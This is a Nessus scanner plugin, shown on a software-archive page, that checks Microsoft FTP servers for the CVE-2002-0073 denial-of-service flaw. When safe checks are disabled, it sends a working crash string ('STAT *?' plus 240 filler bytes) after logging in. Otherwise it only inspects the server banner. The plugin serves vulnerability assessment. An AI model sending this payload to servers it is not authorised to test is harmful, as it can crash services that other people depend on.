home *** CD-ROM | disk | FTP | other *** search

---

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / msftp_dos.nasl

< prev

next >

Wrap

Text File  |  2005-01-14  |  3KB  |  117 lines

---

1. #
2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
3. #
4. # Thanks to: H D Moore
5. # 
6. #
7. # See the Nessus Scripts License for details
8. # 
9.  
10. if(description)
11. {
12.  script_id(10934);
13.  script_bugtraq_id(4482);
14.  script_cve_id("CVE-2002-0073");
15.  if(defined_func("script_xref"))script_xref(name:"IAVA", value:"2002-A-0002");
16.  
17.  script_version ("$Revision: 1.20 $");
18.  
19.  name["english"] = string("MS FTPd DoS");
20.  
21.  script_name(english:name["english"]);
22.          
23.  desc["english"] = "
24. It was possible to make the remote FTP server crash
25. by sending the command 'STAT *?AAAAA....AAAAA'
26.  
27. There is a bug in certain versions of Microsoft FTP server
28. which can be exploited in this fashion.  In addition, other
29. FTP servers may react adversely to such a string.
30.  
31. An attacker may use this flaw to prevent your FTP server
32. from working properly
33.  
34.  
35. Solution : see http://www.microsoft.com/technet/security/bulletin/ms02-018.mspx
36.  
37. CAVEAT: If your FTP server is not a Microsoft product, then contact your FTP
38. vendor for a patch.
39.  
40. Risk factor : Medium";
41.          
42.  script_description(english:desc["english"]);
43.             
44.  
45.  script_summary(english:"Checks if the remote ftp can be crashed",
46.          francais:"DΘtermine si le serveur ftp peut Ωtre plantΘ");
47.  script_category(ACT_MIXED_ATTACK);
48.  script_family(english:"FTP");
49.  script_copyright(english:"This script is Copyright (C) 2002 Renaud Deraison",
50.            francais:"Ce script est Copyright (C) 2002 Renaud Deraison");
51.           
52.  script_dependencies("find_service.nes", "ftp_anonymous.nasl", "iis_asp_overflow.nasl");
53.  script_require_ports("Services/ftp", 21);
54.  exit(0);
55. }
56.  
57. #
58. # The script code starts here : 
59. #
60.  
61. include("ftp_func.inc");
62.  
63.  
64. if ( get_kb_item("Q319733") ) exit(0);
65.  
66. port = get_kb_item("Services/ftp");
67. if(!port)port = 21;
68.  
69. if(! get_port_state(port)) exit(0);
70.  
71.  
72. if(!safe_checks())
73. {
74.  login = get_kb_item("ftp/login");
75.  password = get_kb_item("ftp/password");
76.  if(login)
77.  {
78.  # Connect to the FTP server
79.   soc = open_sock_tcp(port);
80.   if(soc)
81.   {  
82.   if(ftp_log_in(socket:soc, user:login, pass:password))
83.   {
84.      # We are in
85.      c = string("STAT *?", crap(240), "\r\n");
86.      send(socket:soc, data:c);
87.      b = ftp_recv_line(socket:soc);
88.      send(socket:soc, data:string("HELP\r\n"));
89.      r = ftp_recv_line(socket:soc);
90.      if(!r)security_warning(port);
91.      else {
92.      ftp_close(socket: soc);
93.      }
94.     exit(0);
95.    }
96.   }
97.  }
98. }
99.  
100. banner = get_ftp_banner(port: port);
101. if(banner)
102. {
103.  if(egrep(pattern:".*Microsoft FTP Service.*[45]\.0.*$",string:banner))
104.  {
105.          report = 
106. string("It may be possible to make the remote FTP server crash\n",
107. "by sending the command 'STAT *?AAA...AAA.\n\n",
108. "An attacker may use this flaw to prevent your site from distributing files\n\n",
109. "*** Warning : we could not verify this vulnerability.\n",
110. "*** Nessus solely relied on the banner of this server\n\n",
111. "Solution : Apply the relevant hotfix from Microsoft\n\n",
112. "See:http://www.microsoft.com/technet/security/bulletin/ms02-018.mspx\n\n",
113. "Risk factor : Medium");
114.           security_warning(port:port, data:report);
115.    }
116. }
117.